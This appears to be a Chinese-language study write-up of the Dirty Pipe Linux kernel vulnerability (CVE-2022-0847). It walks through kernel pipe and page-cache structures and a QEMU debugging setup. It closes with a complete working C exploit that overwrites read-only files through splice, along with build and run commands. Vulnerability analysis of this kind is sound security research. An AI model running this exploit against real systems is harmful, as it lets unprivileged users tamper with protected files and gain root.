CVE-2022-0847-DIRTY-PIPE-detail

# basic

(之后会把 docker 做好传上去 以后就不用折腾了 QAQ)
https://hub.docker.com/repository/docker/squirre17/dirtypipe

# page cache

Linux 的换页机制是脏页机制,也就是写一个文件是通过写内存缓存页,然后标记脏位,在换页的时候一次性写回磁盘。而不是每次都写磁盘。
在打开文件的时候可以用 O_DIRECT | O_SYNC 来标记对脏页进行直写策略,换回同步。
但这里并不是对文件进行硬存级别的篡改,假设文件进了内存,然后我修改了这个文件内存中的部分内容,短时间再次访问这个文件会直接从内存缓存中拿到我们篡改过的内容而不是去 disk 上取。

# structs

# file

fs.h - include/linux/fs.h - Linux source code (v5.13-rc1) - Bootlin
每一个打开的文件描述符和一个 struct 相对应

  • pipe_inode_info 指向一个内核管道
1
2
3
4
5
6
7
8
9
10
11
struct file {
...
struct path f_path;
struct inode *f_inode;
const struct file_operations *f_op;
...
struct address_space *f_mapping;
...
struct pipe_inode_info    *i_pipe;
...
};

其中的 address_space 指示了这个文件内容的映射位置

# address_space

address_space 的作用就是将文件在磁盘上的数据也 page 的方式连续地呈现出来, 这样读取文件的操作便转换成了先将不连续的磁盘上的内容读取的 page 中, 再从连续的 page 中去读取连续的数据。

  • i_pages: 缓存页组 (是一个 eXtend ARRAY)
  • nrpages: 页表入口的大小
  • a_ops: 记录着对这个文件进行操作的虚表方法 (glibc 打 io 或者内核打 ptmx 类似)
1
2
3
4
5
6
7
8
9
10
struct address_space {
struct inode *host;
struct xarray i_pages;
...
unsigned long nrpages;
pgoff_t writeback_index;
const struct address_space_operations *a_ops;
unsigned long flags;
...
}

# xarray

xarray 指向了多个 page 结构体 也就是这个文件存放在哪几页。(这里是应该是以__rcu 为链表的形式 待验证)

1
2
3
4
5
6
struct xarray {
spinlock_t xa_lock;
/* private: The rest of the data structure is not to be used directly. */
gfp_t xa_flags;
void __rcu * xa_head;
};

# pipe_inode_info

在 file 里的内核管道

  • head 指向生产者 buffer
  • tail 指向消费者 buffer
  • bufs 循环 buffer 的一个链表
    这里的 ring 会被设置为 16 也就是有 16 个循环 buf 供 pipe 使用
    然后 head 和 tail 是用于在 bufs 中做索引的
    例如 &pipe->bufs[(head - 1) & mask]; 这里的 mask 就是 ring-1.
    内核会为一个 pipe 分配 16 个 pipe_buffer,循环缓冲区
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
struct pipe_inode_info {
struct mutex mutex;
wait_queue_head_t rd_wait, wr_wait;
unsigned int head;
unsigned int tail;
unsigned int max_usage;
unsigned int ring_size;

(···)

struct pipe_buffer *bufs;
struct user_struct *user;
#ifdef CONFIG_WATCH_QUEUE
struct watch_queue *watch_queue;
#endif
};


(图片来源 breeze 💐)

# pipe_buffer

每一个 buffer 指向一个 page

1
2
3
4
5
6
7
struct pipe_buffer {
struct page *page;
unsigned int offset, len;
const struct pipe_buf_operations *ops;
unsigned int flags;
unsigned long private;
};

page 结构体

1
2
3
4
5
6
7
8
9
10
struct page {
unsigned long flags;
...
/* Page cache and anonymous pages */
struct address_space *mapping;
pgoff_t index; /* Our offset within mapping. */
...
void *virtual; /* Kernel virtual address (NULL if
not kmapped, ie. highmem) */
}

# inode

在 file 的结构体中可以看到 每一个文件都有 inode (这是文件系统的管理方式),对于管道,也有自己的 inode

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
static struct inode * get_pipe_inode(void)
{
struct inode *inode = new_inode_pseudo(pipe_mnt->mnt_sb);
struct pipe_inode_info *pipe;

if (!inode)
goto fail_inode;

inode->i_ino = get_next_ino();

pipe = alloc_pipe_info();
if (!pipe)
goto fail_iput;

inode->i_pipe = pipe; // inode 指向一个 pipe
pipe->files = 2; // number of struct file referring this pipe (protected by ->i_lock)
pipe->readers = pipe->writers = 1;
inode->i_fop = &pipefifo_fops;

inode->i_state = I_DIRTY;

(···)
}

关于 pipe 的创建

  • 申请了一个 pipe_inode_info 结构体
  • 申请了多个 buf,但是只返回一个指向这多个 buf 的头指针,相当于对一个长度的数组做头结点和尾结点都移动的链表 (数据结构学过的队列那块)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
struct pipe_inode_info *alloc_pipe_info(void)
{
struct pipe_inode_info *pipe;
unsigned long pipe_bufs = PIPE_DEF_BUFFERS;
struct user_struct *user = get_current_user();
unsigned long user_bufs;
unsigned int max_size = READ_ONCE(pipe_max_size);

pipe = kzalloc(sizeof(struct pipe_inode_info), GFP_KERNEL_ACCOUNT);

(···)

pipe->bufs = kcalloc(pipe_bufs, sizeof(struct pipe_buffer),
GFP_KERNEL_ACCOUNT);

if (pipe->bufs) {
init_waitqueue_head(&pipe->rd_wait);
init_waitqueue_head(&pipe->wr_wait);
pipe->r_counter = pipe->w_counter = 1;
pipe->max_usage = pipe_bufs;
pipe->ring_size = pipe_bufs;
pipe->nr_accounted = pipe_bufs;
pipe->user = user;
mutex_init(&pipe->mutex);
return pipe;
}

(···)
}

# iov_iter

iovec 接口用于处理用户传入的用户态缓存

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
struct iov_iter {
/*
* Bit 0 is the read/write bit, set if we're writing.
* Bit 1 is the BVEC_FLAG_NO_REF bit, set if type is a bvec and
* the caller isn't expecting to drop a page reference when done.
*/
unsigned int type;
size_t iov_offset;
size_t count;
union{
(···)
struct pipe_inode_info *pipe;
};
(···)
};

在这里只用到了一个 pipe 对象 (也就是 pipe 对象由 iov_iter 进行管理或者说是更外一层的封装)。
在 PoC 中由 copy_page_to_iter_pipe 函数将用户输入的数据 (page) 写入 iov_iter 管理的 pipe 中

# demo

1
echo "AAAAAAAAAA" > foo
1
2
3
4
5
6
7
8
9
10
#define _GNU_SOURCE
#include <unistd.h>
#include <fcntl.h>
int main(int argc, char **argv) {
for (;;) {
splice(0, 0, 1, 0, 2, 0);
write(1, "BBBBB", 5);
}
}
// ./splicer <foo |cat >/dev/null

# environment

# docker

拉下 ubuntu20, 换个源先

1
2
sed -i "s/http:\/\/archive.ubuntu.com/http:\/\/mirrors.tuna.tsinghua.edu.cn/g" /etc/apt/sources.list
apt-get update && apt-get -y dist-upgrade

启动 docker 的时候千万要注意!!

  • 增加 SYS_PTRACE(打开调试)
  • 增加端口映射(这样才能让外部主机连上 gdb)
1
docker run -it --name=mdp1 --cap-add=SYS_PTRACE -p 1234:1234 my_dirty_pipe:1.0 /bin/bash

# other tools

1
2
3
4
alias agi="/bin/apt-get install -y"
agi vim gdb gdbserver wget make gcc flex bison bc git cpio ninja-build pkg-config automake libtool
agi libncurses-dev openssl libssl-dev dkms libelf-dev libudev-dev libpci-dev libiberty-dev autoconf libglib2.0-dev
agi libpixman-1-dev python

# qemu

一个报错的解决文档 QEMU contribution - HackMD

1
2
3
4
5
6
wget https://download.qemu.org/qemu-6.2.0.tar.xz
mkdir build && cd build # 在下载目录新建文件夹build(这是必须的,因为configure命令必须在build文件夹下执行)
# 以下均在/build目录下
../configure
make # 编译源码
make install # 安装

这得老半天了

# Linux

选用 v5.13-rc1 版本

1
2
3
4
wget https://github.com/torvalds/linux/archive/refs/tags/v5.13-rc1.tar.gz
make menuconfig
cat /proc/cpuinfo| grep "cpu cores" | uniq # check cpu core counts
make bzImage -j4

扣 y 选中

1
2
3
4
5
6
7
kernel hacking ->compile-time checks and compiler opt -> compile the kernel with debug info
-> Provide GDB scripts for kernel debugging
-> Generate readable assembler code
kernel hacking -> compile the kernel with frame pointers (没找到)
kernel hacking -> Generic Kernel Debugging Instruments -> KGDB: kernel debugger ->
KGDB: use kgdb over the serial console (NEW)

然后记得保证以下几个也打开了

1
CONFIG_DEBUG_INFO_DWARF4=y

然后随便找个 ctf 的文件系统就行 或者 busybox 编译。

1
2
cpio -idmv < ../rootfs.img #解包cpio
find . | cpio -o --format=newc > ../rootfs.img #打包cpio
1
2
3
4
5
6
7
8
9
10
11
qemu-system-x86_64 \
-m 256M \
-kernel ./arch/x86/boot/bzImage \
-initrd ./rootfs.img \
-append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet nokaslr" \
-cpu qemu64 \
-nographic \
-net nic,model=virtio \
-net user \
-s \
-S

# 静态分析

# splice 函数

在两个 fd 中移动数据 为零拷贝操作
比如要实现 fp1 到 fp2 的数据拷贝 正常来说是要经历 kernel space -> user space -> kernel space
用 splice 就可以变成 fp1 -> pipe_read -> pipe_write -> fp2

将 fd_in 传递到文件描述符 fd_out,其中文件描述符之一必须引用管道。
splice  的零拷贝方法就是,直接用文件缓存页来替换 pipe  中的缓存页 (更改 pipe 缓存页指针指向文件缓存页)。
也就是实际上不需要经过把我们的输入拷贝到 pipe 这一步,直接把我们数据的缓存页的位置给到需要用到这个的 fd 就行了。(因为 pipe 就是一端写入一端读入,我如果把文件内容写入管道缓冲区,然后再从管道缓冲区写出,不如在管道缓冲区的时候直接让 buffer 的 page 指向原来那个页的内存缓存页,这样就少了 copy 那一步)

1
2
ssize_t splice(int fd_in, loff_t *off_in, int fd_out,
loff_t *off_out, size_t len, unsigned int flags);
  • If fd_in refers to a pipe, then off_in must be NULL
  • If fd_in does not refer to a pipe and off_in is NULL, then bytes are read from fd_in starting from the file offset, and the file offset is adjusted appropriately.

splice 最终会调用 copy_page_to_iter_pipe 函数
而这个函数并没有清除 PIPE_BUF_FLAG_CAN_MERGE
iov_iter 携带了我们写入的那个管道 而这个管道的头部 buf 被指向了我们送入的第一个参数 page,这个 page 是内存缓存页的内容。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t bytes,
struct iov_iter *i)
{
struct pipe_inode_info *pipe = i->pipe;
struct pipe_buffer *buf;
unsigned int p_tail = pipe->tail;
unsigned int p_mask = pipe->ring_size - 1;
unsigned int i_head = i->head;
size_t off;

(···)

buf = &pipe->bufs[i_head & p_mask];

(···)

/* 重点 buf的ops指向了文件缓存页 */
buf->ops = &page_cache_pipe_buf_ops;
get_page(page);
buf->page = page;/* 直接指向了文件缓存页 */
buf->offset = offset;
buf->len = bytes;

pipe->head = i_head + 1;
i->iov_offset = offset + bytes;
i->head = i_head;
out:
i->count -= bytes;
return bytes;
}

# pipe_write 分析

利用的点是 pipe 被初始化申请会默认设置 flag 为 PIPE_BUF_FLAG_CAN_MERGE

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
static ssize_t
pipe_write(struct kiocb *iocb, struct iov_iter *from)
{
struct file *filp = iocb->ki_filp;
struct pipe_inode_info *pipe = filp->private_data;
unsigned int head;
ssize_t ret = 0;
size_t total_len = iov_iter_count(from);
ssize_t chars;
bool was_empty = false;
bool wake_next_writer = false;

(···)

head = pipe->head; // 获取头结点 head是int类型
// pipe是循环链表结构 如果head == tail 代表空了
was_empty = pipe_empty(head, pipe->tail);
// chars就是数据长度
chars = total_len & (PAGE_SIZE-1);

/* 如果有长度且管道不为空 */
if (chars && !was_empty) {
unsigned int mask = pipe->ring_size - 1;
// buf指向管道的缓冲区
struct pipe_buffer *buf = &pipe->bufs[(head - 1) & mask];
int offset = buf->offset + buf->len;

/* ☆ 此处重点 ☆
如果flags标志位为 PIPE_BUF_FLAG_CAN_MERGE
并且当前buf已经写过的offset加上即将写的chars的大小小于PSIZE
就会继续写
*/
if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&
offset + chars <= PAGE_SIZE) {
// 验证数据存在 和IO阻塞相关 返回0代表正常
ret = pipe_buf_confirm(pipe, buf);
(···)

// 此函数就是往管道的buf所在的页写数据了 如果写了之后会直接go out 不会走下面的for(;;)
ret = copy_page_from_iter(buf->page, offset, chars, from);
(···)

buf->len += ret;
(···)
}
}

// 上一页不能接着写的情况 就是本应该走的正常情况
for (;;) {
(···)

head = pipe->head;
if (!pipe_full(head, pipe->tail, pipe->max_usage)) {
unsigned int mask = pipe->ring_size - 1;
struct pipe_buffer *buf = &pipe->bufs[head & mask];
struct page *page = pipe->tmp_page;
int copied;

// 重新申请一个page
if (!page) {
page = alloc_page(GFP_HIGHUSER | __GFP_ACCOUNT);

(···)

pipe->tmp_page = page;
}

spin_lock_irq(&pipe->rd_wait.lock);

head = pipe->head;
if (pipe_full(head, pipe->tail, pipe->max_usage)) {
spin_unlock_irq(&pipe->rd_wait.lock);
continue;
}

pipe->head = head + 1;
spin_unlock_irq(&pipe->rd_wait.lock);

/* Insert it into the buffer array */
/* 重点 初始化阶段 */
buf = &pipe->bufs[head & mask];
buf->page = page;
buf->ops = &anon_pipe_buf_ops;
buf->offset = 0;
buf->len = 0;
if (is_packetized(filp))
buf->flags = PIPE_BUF_FLAG_PACKET;
else// ☆ 默认设置flag为 PIPE_BUF_FLAG_CAN_MERGE
buf->flags = PIPE_BUF_FLAG_CAN_MERGE;
pipe->tmp_page = NULL;

copied = copy_page_from_iter(page, 0, PAGE_SIZE, from);
(···)
}

# POC 分析

  • 作者首先填满了 16 个 PIPE,将 flag 都默认设置为 PIPE_BUF_FLAG_CAN_MERGE
  • 然后读取 清空 pipe
  • 用 open 打开对应文件,只读即可 这样就将文件放到缓存页里了
  • splice 系统调用将对应的管道的 buf 和文件缓存页绑定在一起
  • 利用 splice 不初始化 PIPE_BUF_FLAG_CAN_MERGE 的特性 继续往管道里写入 就写入到了对应的文件缓存区了
    这就造成了一个任意文件写的漏洞
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
#define _GNU_SOURCE
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/user.h>

#ifndef PAGE_SIZE
#define PAGE_SIZE 4096
#endif

/**
* Create a pipe where all "bufs" on the pipe_inode_info ring have the
* PIPE_BUF_FLAG_CAN_MERGE flag set.
*/
static void prepare_pipe(int p[2])
{
if (pipe(p)) abort();

const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);
static char buffer[4096];

/* fill the pipe completely; each pipe_buffer will now have
the PIPE_BUF_FLAG_CAN_MERGE flag */
for (unsigned r = pipe_size; r > 0;) {
unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
write(p[1], buffer, n);
r -= n;
}

/* drain the pipe, freeing all pipe_buffer instances (but
leaving the flags initialized) */
for (unsigned r = pipe_size; r > 0;) {
unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
read(p[0], buffer, n);
r -= n;
}

/* the pipe is now empty, and if somebody adds a new
pipe_buffer without initializing its "flags", the buffer
will be mergeable */
}

int main(int argc, char **argv)
{
if (argc != 4) {
fprintf(stderr, "Usage: %s TARGETFILE OFFSET DATA\n", argv[0]);
return EXIT_FAILURE;
}

/* dumb command-line argument parser */
const char *const path = argv[1];
loff_t offset = strtoul(argv[2], NULL, 0);
const char *const data = argv[3];
const size_t data_size = strlen(data);

if (offset % PAGE_SIZE == 0) {
fprintf(stderr, "Sorry, cannot start writing at a page boundary\n");
return EXIT_FAILURE;
}

const loff_t next_page = (offset | (PAGE_SIZE - 1)) + 1;
const loff_t end_offset = offset + (loff_t)data_size;
if (end_offset > next_page) {
fprintf(stderr, "Sorry, cannot write across a page boundary\n");
return EXIT_FAILURE;
}

/* open the input file and validate the specified offset */
const int fd = open(path, O_RDONLY); // yes, read-only! :-)
if (fd < 0) {
perror("open failed");
return EXIT_FAILURE;
}

struct stat st;
if (fstat(fd, &st)) {
perror("stat failed");
return EXIT_FAILURE;
}

if (offset > st.st_size) {
fprintf(stderr, "Offset is not inside the file\n");
return EXIT_FAILURE;
}

if (end_offset > st.st_size) {
fprintf(stderr, "Sorry, cannot enlarge the file\n");
return EXIT_FAILURE;
}

/* create the pipe with all flags initialized with
PIPE_BUF_FLAG_CAN_MERGE */
int p[2];
prepare_pipe(p);

/* splice one byte from before the specified offset into the
pipe; this will add a reference to the page cache, but
since copy_page_to_iter_pipe() does not initialize the
"flags", PIPE_BUF_FLAG_CAN_MERGE is still set */
--offset;
ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0);
if (nbytes < 0) {
perror("splice failed");
return EXIT_FAILURE;
}
if (nbytes == 0) {
fprintf(stderr, "short splice\n");
return EXIT_FAILURE;
}

/* the following write will not create a new pipe_buffer, but
will instead write into the page cache, because of the
PIPE_BUF_FLAG_CAN_MERGE flag */
nbytes = write(p[1], data, data_size);
if (nbytes < 0) {
perror("write failed");
return EXIT_FAILURE;
}
if ((size_t)nbytes < data_size) {
fprintf(stderr, "short write\n");
return EXIT_FAILURE;
}

printf("It worked!\n");
return EXIT_SUCCESS;
}

1
2
gcc exp.c -o exp --static
./exp file offset string